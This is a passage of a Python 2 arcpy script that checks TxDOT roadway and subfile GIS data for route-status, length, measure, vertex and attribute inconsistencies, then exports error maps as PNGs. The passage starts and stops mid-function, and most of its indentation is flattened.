cursor = arcpy.SearchCursor(subfiles, "(SUBFILE = 2 AND ADMIN_SYSTEM <> 8) OR SUBFILE = 3 OR SUBFILE = 1")
for row in cursor:
id = row.RTE_ID
length = row.LEN_OF_SECTION
status = row.HIGHWAY_STATUS
if status == 4 or status == 1:
thiskey = id + "=" + str(1)
if thiskey in openstatus.keys():
if thiskey in hwystatus:
hwystatus[thiskey] = hwystatus[thiskey] + length
else:
hwystatus[thiskey] = length
else:
errorinfo = []
errorinfo.append(id)
errorinfo.append("N/A")
errorinfo.append(status)
errorinfo.append("RTE_ID has SUBFILES with status which does not match TxDOT_Roadways' RTE_OPEN")
errorinfo.append(row.DISTRICT)
errors.append(errorinfo)
counter += 1
elif status == 0:
thiskey = id + "=" + str(0)
if thiskey in openstatus.keys():
if thiskey in hwystatus:
hwystatus[thiskey] = hwystatus[thiskey] + length
else:
hwystatus[thiskey] = length
else:
errorinfo = []
errorinfo.append(id)
errorinfo.append("N/A")
errorinfo.append(status)
errorinfo.append("RTE_ID has SUBFILES with status which does not match TxDOT_Roadways' RTE_OPEN")
errorinfo.append(row.DISTRICT)
errors.append(errorinfo)
counter += 1
else:
errorinfo = []
errorinfo.append(id)
errorinfo.append("N/A")
errorinfo.append(status)
errorinfo.append("HIGHWAY_STATUS must be 0 or 4")
errorinfo.append(row.DISTRICT)
errors.append(errorinfo)
counter += 1
del cursor
for key in openstatus.keys():
if key in hwystatus.keys():
linelen = openstatus[key]
sublen = hwystatus[key]
id = key.split("=")[0]
open = key.split("=")[1]
if abs(linelen - sublen) > .004:
cursor = arcpy.SearchCursor(subfiles, "RTE_ID = '" + id + "'")
for row in cursor:
Dist_Num = row.DISTRICT
try:
errorinfo = []
errorinfo.append(id)
errorinfo.append(open)
errorinfo.append("N/A")
errorinfo.append("Length error. SUBFILES LEN_OF_SECTIONS does not match ROADWAYS Route_Length")
errorinfo.append(Dist_Num)
errors.append(errorinfo)
except:
errorinfo = []
errorinfo.append(id)
errorinfo.append(open)
errorinfo.append("N/A")
errorinfo.append("RTE_ID does not exist in SUBFILES")
errorinfo.append("")
errors.append(errorinfo)
arcpy.AddMessage("check out: " + str(id))
counter += 1
else:
pass
else:
id = key.split("=")[0]
open = key.split("=")[1]
cursor = arcpy.SearchCursor(subfiles, "RTE_ID = '" + id + "'")
for row in cursor:
Dist_Num = row.DISTRICT
try:
errorinfo = []
errorinfo.append(id)
errorinfo.append(open)
errorinfo.append("N/A")
errorinfo.append("RTE_ID in TxDOT_Roadways with this RTE_OPEN does not match SUBFILES' HIGHWAY_STATUS")
errorinfo.append(Dist_Num)
errors.append(errorinfo)
except:
errorinfo = []
errorinfo.append(id)
errorinfo.append(open)
errorinfo.append("N/A")
errorinfo.append("RTE_ID does not exist in SUBFILES")
errorinfo.append("")
errors.append(errorinfo)
arcpy.AddMessage("check out: " + str(id))
counter += 1
arcpy.AddMessage(str(counter) + " subfile vs roadways Route Open errors.")
d[routeopen] = errors
except:
print "!!!RTE OPEN FAILED!!!"
def measurelength(d):
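    """Off-system geometry check: for each roadway, compare the measure range
    (MMax - MMin), the shape length and RTE_LEN, flagging differences greater
    than 0.003 miles."""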
try:
arcpy.AddMessage("Starting off-system geometry check...")
counter = 0
cursor = arcpy.SearchCursor(roadways, where)
errors = []
for row in cursor:
errorinfo = []
id = row.RTE_ID
geom = row.shape
ext = geom.extent
Mmin = round(ext.MMin, 3)
Mmax = round(ext.MMax, 3)
Mdiff = abs(Mmax - Mmin)
wholelen = geom.length * .000621371
shp_len = float(format(float(wholelen), '.3f'))
rte_len = row.RTE_LEN
testlen = abs(shp_len - Mdiff)
if rte_len is not None and id is not None:
if testlen <= .003 and abs(rte_len - shp_len) > .003:
oid = str(row.OBJECTID)
arcpy.AddMessage(
"RTE_LEN replaced: " + str(oid) + "," + str(rte_len) + "," + str(shp_len) + "," + str(Mdiff))
# cur = arcpy.UpdateCursor(txdotroads, "OBJECTID = " + oid)
# for i in cur:
# i.setValue("RTE_LEN", wholelen)
# cur.updateRow(i)
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append(abs(shp_len - Mdiff))
errors.append(errorinfo)
counter += 1
elif abs(shp_len - Mdiff) > .003:
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append(abs(shp_len - Mdiff))
errors.append(errorinfo)
counter += 1
elif abs(rte_len - Mdiff) > .003:
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append(abs(rte_len - Mdiff))
errors.append(errorinfo)
counter += 1
elif abs(shp_len - rte_len) > .003:
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append(abs(shp_len - rte_len))
errors.append(errorinfo)
counter += 1
else:
pass
else:
oid = str(row.OBJECTID)
errorinfo.append("OID: " + oid)
errorinfo.append(str(Mdiff))
errorinfo.append(str(shp_len))
errorinfo.append(str(rte_len))
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("")
errors.append(errorinfo)
counter += 1
arcpy.AddMessage(str(counter) + " measure length errors.")
del cursor
del row
d[measurelength] = errors
except:
print "!!!MEASURE LENGTH FAILED!!!"
def roadwaydict():
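    """Build a lookup of {RTE_ID: [total RTE_LEN, min measure, max measure]}
    from TXDOT_Roadways, collecting null RTE_ID / RTE_LEN errors along the
    way. Returns [errors, dictionary]."""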
errors = []
counter = 0
arcpy.AddMessage("...creating subfile length dictionary...")
dictionary = {}
cursor = arcpy.SearchCursor(roadways, where)
    for row in cursor:
        id = row.RTE_ID
        geom = row.shape
        ext = geom.extent
        Mmin = float(format(float(ext.MMin), '.3f'))
        Mmax = float(format(float(ext.MMax), '.3f'))
        if row.RTE_LEN is not None:
            len = row.RTE_LEN
        else:
            # Missing RTE_LEN: record the error and fall back to zero length.
            len = 0
            oid = str(row.OBJECTID)
            errorinfo = []
            errorinfo.append("OBJECTID: " + oid)
            errorinfo.append("")
            errorinfo.append("")
            errorinfo.append(Mmin)
            errorinfo.append("")
            errorinfo.append(Mmax)
            errorinfo.append("")
            errorinfo.append(len)
            errorinfo.append("NO RTE_LEN POPULATED. OBJECTID: " + oid)
            errors.append(errorinfo)
            counter += 1
if id not in dictionary.keys() and id is not None:
dictionary[str(id)] = [len, Mmin, Mmax]
elif id in dictionary.keys() and id is not None:
currentrecord = dictionary[id]
currentlength = currentrecord[0]
currentmin = currentrecord[1]
currentmax = currentrecord[2]
newlen = currentlength + len
if Mmin < currentmin:
currentmin = Mmin
if Mmax > currentmax:
currentmax = Mmax
dictionary[str(id)] = [newlen, currentmin, currentmax]
else:
oid = str(row.OBJECTID)
errorinfo = []
errorinfo.append("OBJECTID: " + oid)
errorinfo.append("")
errorinfo.append("")
errorinfo.append(Mmin)
errorinfo.append("")
errorinfo.append(Mmax)
errorinfo.append("")
errorinfo.append(len)
errorinfo.append("NO ROUTE ID. OBJECTID: " + oid)
errors.append(errorinfo)
counter += 1
del cursor
del row
arcpy.AddMessage("Dictionary complete")
arcpy.AddMessage(str(counter) + " null RTE_ID and RTE_LEN errors")
theball = [errors, dictionary]
return theball
def subfilelength(d):
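    """Subfile length check: walk SUBFILES ordered by RTE_ID and BMP, summing
    LEN_OF_SECTION per route, and compare the totals and BMP/EMP extents
    against the roadway dictionary built by roadwaydict()."""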
try:
arcpy.AddMessage("Starting subfile length check...")
theball = roadwaydict()
errors = theball[0]
dictionary = theball[1]
total = 0
cursor = arcpy.SearchCursor(subfiles, "(SUBFILE = 2 AND ADMIN_SYSTEM <> 8) OR SUBFILE = 3 OR SUBFILE = 1")
for row in cursor:
total += 1
del cursor
del row
# counto = int(arcpy.GetCount_management(subfiles).getOutput(0))
# total = counto - 1
starter = 0
counter = 0
previous = ""
cursor = arcpy.SearchCursor(subfiles, "(SUBFILE = 2 AND ADMIN_SYSTEM <> 8) OR SUBFILE = 3 OR SUBFILE = 1", "", "",
"RTE_ID A; BMP A")
for row in cursor:
id = row.RTE_ID
if id in dictionary.keys():
current = id
if starter == 0:
sublength = 0
linevalues = dictionary[current]
linelen = linevalues[0]
linemin = linevalues[1]
linemax = linevalues[2]
bmp1 = row.BMP
bmp = row.BMP
emp = row.EMP
sublength += row.LEN_OF_SECTION
dist = row.DISTRICT
if abs((emp - bmp) - row.LEN_OF_SECTION) > .001:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append("")
errorinfo.append(sublength)
errorinfo.append("")
errorinfo.append(
"BMP and EMP difference does not equal the LEN_OF_SECTION. SUBFILE OID: " + str(row.OBJECTID))
errors.append(errorinfo)
counter += 1
previous = current
elif current != previous and starter != total:
if abs(linelen - sublength) > .003:
errorinfo = []
errorinfo.append(previous)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append(sublength)
errorinfo.append(linelen)
errorinfo.append("RTE_LEN does not equal SUBFILES total LEN_OF_SECTION")
errors.append(errorinfo)
counter += 1
if abs(linemin - bmp1) > .002:
errorinfo = []
errorinfo.append(previous)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line minimum measure does not equal starting BMP")
errors.append(errorinfo)
counter += 1
if abs(linemax - emp) > .003:
errorinfo = []
errorinfo.append(previous)
errorinfo.append(dist)
errorinfo.append("")
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line maximum measure does not equal ending EMP")
errors.append(errorinfo)
counter += 1
sublength = 0
linevalues = dictionary[current]
linelen = linevalues[0]
linemin = linevalues[1]
linemax = linevalues[2]
bmp1 = row.BMP
bmp = row.BMP
emp = row.EMP
sublength += row.LEN_OF_SECTION
dist = row.DISTRICT
if abs((emp - bmp) - row.LEN_OF_SECTION) > .001:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append("")
errorinfo.append(sublength)
errorinfo.append("")
errorinfo.append(
"BMP and EMP difference does not equal the LEN_OF_SECTION. SUBFILE OID: " + str(row.OBJECTID))
errors.append(errorinfo)
counter += 1
previous = current
elif current == previous and starter != total:
bmp = row.BMP
emp = row.EMP
sublength += row.LEN_OF_SECTION
dist = row.DISTRICT
if abs((emp - bmp) - row.LEN_OF_SECTION) > .001:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append("")
errorinfo.append(sublength)
errorinfo.append("")
errorinfo.append(
"BMP and EMP difference does not equal the LEN_OF_SECTION. SUBFILE OID: " + str(row.OBJECTID))
errors.append(errorinfo)
counter += 1
previous = current
elif current != previous and starter == total:
if abs(linelen - sublength) > .003:
errorinfo = []
errorinfo.append(previous)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append(sublength)
errorinfo.append(linelen)
errorinfo.append("RTE_LEN does not equal SUBFILES total LEN_OF_SECTION")
errors.append(errorinfo)
counter += 1
if abs(linemin - bmp1) > .002:
errorinfo = []
errorinfo.append(previous)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line minimum measure does not equal starting BMP")
errors.append(errorinfo)
counter += 1
if abs(linemax - emp) > .003:
errorinfo = []
errorinfo.append(previous)
errorinfo.append(dist)
errorinfo.append("")
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line maximum measure does not equal ending EMP")
errors.append(errorinfo)
counter += 1
sublength = 0
linevalues = dictionary[current]
linelen = linevalues[0]
linemin = linevalues[1]
linemax = linevalues[2]
bmp1 = row.BMP
bmp = row.BMP
emp = row.EMP
sublength += row.LEN_OF_SECTION
dist = row.DISTRICT
if abs((emp - bmp) - row.LEN_OF_SECTION) > .001:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append("")
errorinfo.append(sublength)
errorinfo.append("")
errorinfo.append(
"BMP and EMP difference does not equal the LEN_OF_SECTION. SUBFILE OID: " + str(row.OBJECTID))
errors.append(errorinfo)
counter += 1
if abs(linelen - sublength) > .003:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append(sublength)
errorinfo.append(linelen)
errorinfo.append("RTE_LEN does not equal SUBFILES total LEN_OF_SECTION")
errors.append(errorinfo)
counter += 1
if abs(linemin - bmp1) > .002:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line minimum measure does not equal starting BMP")
errors.append(errorinfo)
counter += 1
if abs(linemax - emp) > .003:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append("")
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line maximum measure does not equal ending EMP")
errors.append(errorinfo)
counter += 1
elif current == previous and starter == total:
bmp = row.BMP
emp = row.EMP
sublength += row.LEN_OF_SECTION
dist = row.DISTRICT
if abs((emp - bmp) - row.LEN_OF_SECTION) > .001:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append("")
errorinfo.append(sublength)
errorinfo.append("")
errorinfo.append(
"BMP and EMP difference does not equal the LEN_OF_SECTION. SUBFILE OID: " + str(row.OBJECTID))
errors.append(errorinfo)
counter += 1
if abs(linelen - sublength) > .003:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append(sublength)
errorinfo.append(linelen)
errorinfo.append("RTE_LEN does not equal SUBFILES total LEN_OF_SECTION")
errors.append(errorinfo)
counter += 1
if abs(linemin - bmp1) > .002:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line minimum measure does not equal starting BMP")
errors.append(errorinfo)
counter += 1
if abs(linemax - emp) > .003:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append("")
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line maximum measure does not equal ending EMP")
errors.append(errorinfo)
counter += 1
starter += 1
arcpy.AddMessage(str(starter) + "/" + str(total))
else:
starter += 1
arcpy.AddMessage(str(starter) + "/" + str(total))
pass
arcpy.AddMessage(str(counter) + " subfile length errors.")
d[subfilelength] = errors
except:
print "!!!SUBFILE LENGTH FAILED!!!"
def removevertices(d):
try:
arcpy.AddMessage("Starting multipart and vertex measure check...")
counter = 0
errors = []
query = """ RDBD_TYPE <> 'CNCTR-GS' AND RDBD_TYPE <> 'CONNECTOR' AND RDBD_TYPE <> 'OTHER' AND RDBD_TYPE <> 'RAMP' AND RDBD_TYPE <> 'TURNAROUND' """
cursor = arcpy.SearchCursor(roadways, query)
for row in cursor:
geom = row.shape
allparts = geom.getPart()
if allparts.count > 1:
errorinfo = []
errorinfo.append(row.OBJECTID)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("Multipart feature.")
errors.append(errorinfo)
counter += 1
try:
lastX = 0
lastY = 0
lastM = 0
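                # Walk every vertex of every part. The checks below expect LG and XG
                # roadbeds to have M values that decrease from vertex to vertex and the
                # remaining measured roadbed types to increase; a NaN measure is flagged
                # as geometry that still needs measures applied.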
for part in allparts:
srtpnt = 0
for pnt in part:
if srtpnt == 0:
x = pnt.X
y = pnt.Y
m = pnt.M
if row.RDBD_TYPE == "LG" or row.RDBD_TYPE == "XG":
if math.isnan(m):
errorinfo = []
errorinfo.append(row.OBJECTID)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("Has vertex with zero measure, apply measures.")
if errorinfo not in errors:
errors.append(errorinfo)
counter += 1
lastX = x
lastY = y
lastM = m
srtpnt += 1
else:
x = pnt.X
y = pnt.Y
m = pnt.M
if row.RDBD_TYPE == "LG" or row.RDBD_TYPE == "XG":
if math.isnan(m):
errorinfo = []
errorinfo.append(row.OBJECTID)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("Has vertex with zero measure, apply measures.")
if errorinfo not in errors:
errors.append(errorinfo)
counter += 1
if m >= lastM:
errorinfo = []
errorinfo.append(row.OBJECTID)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("LG or XG with non-decreasing measure, Re-apply measures.")
if errorinfo not in errors:
errors.append(errorinfo)
counter += 1
elif row.RDBD_TYPE == "KG" or row.RDBD_TYPE == "AG" or row.RDBD_TYPE == "XG":
if math.isnan(m):
errorinfo = []
errorinfo.append(row.OBJECTID)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("Has vertex with zero measure, apply measures.")
if errorinfo not in errors:
errors.append(errorinfo)
counter += 1
if m <= lastM:
errorinfo = []
errorinfo.append(row.OBJECTID)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("KG, AG, or XG with non-increasing measure, Re-apply measures.")
if errorinfo not in errors:
errors.append(errorinfo)
counter += 1
lastX = x
lastY = y
lastM = m
except:
errorinfo = []
errorinfo.append(row.OBJECTID)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("Geometry Error. Please check geometry.")
errors.append(errorinfo)
counter += 1
print str(counter) + " multipart and vertex measure errors."
d[removevertices] = errors
arcpy.AddMessage("Creating PNGs...")
arcpy.AddMessage("Exporting 1 of 3...")
mxd = arcpy.mapping.MapDocument("T:\\DATAMGT\\MAPPING\\Data Quality Checks\\Error_Check_Scripts\\MeasureErrors.mxd")
arcpy.mapping.ExportToPNG(mxd, workspace + "\\Measure Errors " + str(today) + ".png")
del mxd
arcpy.AddMessage("Exporting 2 of 3...")
mxd = arcpy.mapping.MapDocument(
"T:\\DATAMGT\\MAPPING\\Data Quality Checks\\Error_Check_Scripts\\MeasureErrors_LG_XG.mxd")
arcpy.mapping.ExportToPNG(mxd, workspace + "\\Measure LG XG Red is Bad " + str(today) + ".png")
del mxd
arcpy.AddMessage("Exporting 3 of 3...")
mxd = arcpy.mapping.MapDocument(
"T:\\DATAMGT\\MAPPING\\Data Quality Checks\\Error_Check_Scripts\\MeasureErrors_Not_LG_XG.mxd")
arcpy.mapping.ExportToPNG(mxd, workspace + "\\Measure RG AG Red is Bad " + str(today) + ".png")
del mxd
arcpy.AddMessage("PNGs Complete.")
except:
print "!!!REMOVE VERTICIES FAILED!!!"
def onsystem(d):
try:
arcpy.AddMessage("Starting on-system attribute and measure checks...")
counter = 0
atterrors = []
measerrors = []
query = """ (RTE_CLASS ='1' or RTE_CLASS ='6') AND RDBD_TYPE <> 'RAMP' AND RDBD_TYPE <> 'TURNAROUND' AND RDBD_TYPE <> 'CONNECTOR' """
cursor = arcpy.SearchCursor(roadways, query)
for row in cursor:
idpfx = row.RTE_ID[:2]
if row.RTE_PRFX != idpfx:
if row.RDBD_TYPE != "CNCTR-GS":
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_PRFX)
errorinfo.append(idpfx)
errorinfo.append("RTE_PRFX inconsistent with RTE_ID")
atterrors.append(errorinfo)
counter += 1
nmpfx = row.RTE_NM[:2]
if row.RTE_PRFX != nmpfx:
if row.RDBD_TYPE != "CNCTR-GS":
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_PRFX)
errorinfo.append(nmpfx)
errorinfo.append("RTE_PRFX inconsistent with RTE_NM")
atterrors.append(errorinfo)
counter += 1
idtype = row.RTE_ID[-2:]
if row.RDBD_TYPE != idtype:
if row.RDBD_TYPE != "RAMP" and row.RDBD_TYPE != "CONNECTOR" and row.RDBD_TYPE != "TURNAROUND" and row.RDBD_TYPE != "CNCTR-GS" and row.RDBD_TYPE != "OTHER":
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RDBD_TYPE)
errorinfo.append(idtype)
errorinfo.append("RDBD_TYPE inconsistent with RTE_ID")
atterrors.append(errorinfo)
counter += 1
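            # Zero-pad RTE_NBR to four characters so it can be compared with the
            # route number embedded in RTE_NM and RTE_ID (characters 3 through 6).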
if row.RTE_NBR is None:
idnbr = row.RTE_ID[2:6]
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append("NULL")
errorinfo.append(idnbr)
errorinfo.append("RTE_NBR is Null. Populate RTE_NBR.")
atterrors.append(errorinfo)
counter += 1
txtRTE_NBR = ""
elif len(row.RTE_NBR) == 1:
txtRTE_NBR = "000" + row.RTE_NBR
elif len(row.RTE_NBR) == 2:
txtRTE_NBR = "00" + row.RTE_NBR
elif len(row.RTE_NBR) == 3:
txtRTE_NBR = "0" + row.RTE_NBR
else:
txtRTE_NBR = row.RTE_NBR
nmnbr = row.RTE_NM[2:6]
if txtRTE_NBR != nmnbr:
if row.RDBD_TYPE != "CNCTR-GS":
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(txtRTE_NBR)
errorinfo.append(nmnbr)
errorinfo.append("RTE_NBR inconsistent with RTE_NM")
atterrors.append(errorinfo)
counter += 1
idnbr = row.RTE_ID[2:6]
if txtRTE_NBR != idnbr:
if row.RDBD_TYPE != "CNCTR-GS":
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(txtRTE_NBR)
errorinfo.append(idnbr)
errorinfo.append("RTE_NBR inconsistent with RTE_ID")
atterrors.append(errorinfo)
counter += 1
if len(row.RTE_NM) == 7:
nmsfx = row.RTE_NM[-1:]
if row.RTE_SFX != nmsfx:
if row.RDBD_TYPE != "CNCTR-GS":
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_SFX)
errorinfo.append(nmsfx)
errorinfo.append("RTE_SFX inconsistent with RTE_NM")
atterrors.append(errorinfo)
counter += 1
idsfx = row.RTE_ID[6:7]
if row.RTE_SFX != idsfx:
if row.RDBD_TYPE != "CNCTR-GS":
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_SFX)
errorinfo.append(idsfx)
errorinfo.append("RTE_SFX inconsistent with RTE_ID")
atterrors.append(errorinfo)
counter += 1
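            # Three-way length consistency check (all values in miles): the route's
            # measure range (MMax - MMin), its geometric shape length, and the
            # RTE_LEN attribute should agree to within roughly 0.003 mi; the
            # branches below report whichever pair disagrees.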
id = row.RTE_ID
geom = row.shape
ext = geom.extent
Mmin = round(ext.MMin, 3)
Mmax = round(ext.MMax, 3)
Mdiff = abs(Mmax - Mmin)
wholelen = geom.length * .000621371
shp_len = float(format(float(wholelen), '.3f'))
rte_len = row.RTE_LEN
testlen = abs(shp_len - Mdiff)
if rte_len is not None and id is not None:
if testlen <= .003 and abs(rte_len - shp_len) > .003:
errorinfo = []
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append(abs(rte_len - shp_len))
measerrors.append(errorinfo)
counter += 1
elif abs(shp_len - Mdiff) > .003:
errorinfo = []
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append(abs(shp_len - Mdiff))
measerrors.append(errorinfo)
counter += 1
elif abs(rte_len - Mdiff) > .003:
errorinfo = []
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append(abs(rte_len - Mdiff))
measerrors.append(errorinfo)
counter += 1
elif abs(shp_len - rte_len) > .003:
errorinfo = []
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append(abs(shp_len - rte_len))
measerrors.append(errorinfo)
counter += 1
else:
pass
else:
oid = str(row.OBJECTID)
id = str(row.RTE_ID)
errorinfo = []
errorinfo.append(id)
errorinfo.append(str(Mdiff))
errorinfo.append(str(shp_len))
errorinfo.append(str(rte_len))
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("OID: " + oid)
measerrors.append(errorinfo)
counter += 1
arcpy.AddMessage(str(counter) + " on system attribute and measure errors.")
errors = [atterrors, measerrors]
d[onsystem] = errors
except:
print "!!!ONSYSTEM FAILED!!!"
def offsysatt(d):
try:
arcpy.AddMessage("Starting off-system attribute check...")
counter = 0
errors = []
query = """ (RTE_CLASS = '2' OR RTE_CLASS = '3') AND RDBD_TYPE = 'KG' """
cursor = arcpy.SearchCursor(roadways, query)
for row in cursor:
if row.RTE_CLASS == '2':
nmpfx1 = row.RTE_NM[3:5]
nmpfx2 = row.RTE_NM[3:4]
if row.RTE_PRFX == nmpfx1 or row.RTE_PRFX == nmpfx2:
pass
else:
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_PRFX)
errorinfo.append(nmpfx1)
errorinfo.append("RTE_PRFX inconsistent with RTE_NM")
errors.append(errorinfo)
counter += 1
idpfx1 = row.RTE_ID[3:5]
idpfx2 = row.RTE_ID[3:4]
if row.RTE_PRFX == idpfx1 or row.RTE_PRFX == idpfx2:
pass
else:
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_PRFX)
errorinfo.append(idpfx1)
errorinfo.append("RTE_PRFX inconsistent with RTE_ID")
errors.append(errorinfo)
counter += 1
if row.RTE_ID != row.RTE_NM:
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.RTE_NM)
errorinfo.append("RTE_ID inconsistent with RTE_NM")
errors.append(errorinfo)
counter += 1
if len(row.RTE_NBR) == 1:
txtRTE_NBR = "000" + row.RTE_NBR
elif len(row.RTE_NBR) == 2:
txtRTE_NBR = "00" + row.RTE_NBR
elif len(row.RTE_NBR) == 3:
txtRTE_NBR = "0" + row.RTE_NBR
else:
txtRTE_NBR = row.RTE_NBR
nmnbr1 = row.RTE_NM[5:9]
nmnbr2 = row.RTE_NM[4:9]
if txtRTE_NBR == nmnbr1 or txtRTE_NBR == nmnbr2:
pass
else:
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(txtRTE_NBR)
errorinfo.append(nmnbr2)
errorinfo.append("RTE_NBR inconsistent with RTE_NM")
errors.append(errorinfo)
counter += 1
idnbr1 = row.RTE_ID[5:9]
idnbr2 = row.RTE_ID[4:9]
if txtRTE_NBR == idnbr1 or txtRTE_NBR == idnbr2:
pass
else:
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(txtRTE_NBR)
errorinfo.append(idnbr2)
errorinfo.append("RTE_NBR inconsistent with RTE_ID")
errors.append(errorinfo)
counter += 1
if row.RTE_CLASS == '3':
if row.RTE_PRFX != "FC":
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_PRFX)
errorinfo.append(row.RTE_CLASS)
errorinfo.append("RTE_PRFX inconsistent with RTE_CLASS")
errors.append(errorinfo)
counter += 1
if row.RTE_NM is None:
pass
elif len(row.RTE_NM) > 1:
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_NM)
errorinfo.append(row.RTE_CLASS)
errorinfo.append("RTE_NM should not be populated for RTE_CLASS = 3")
errors.append(errorinfo)
counter += 1
if len(row.RTE_ID) > 6:
errorinfo = []
errorinfo.append(row.RTE_ID)
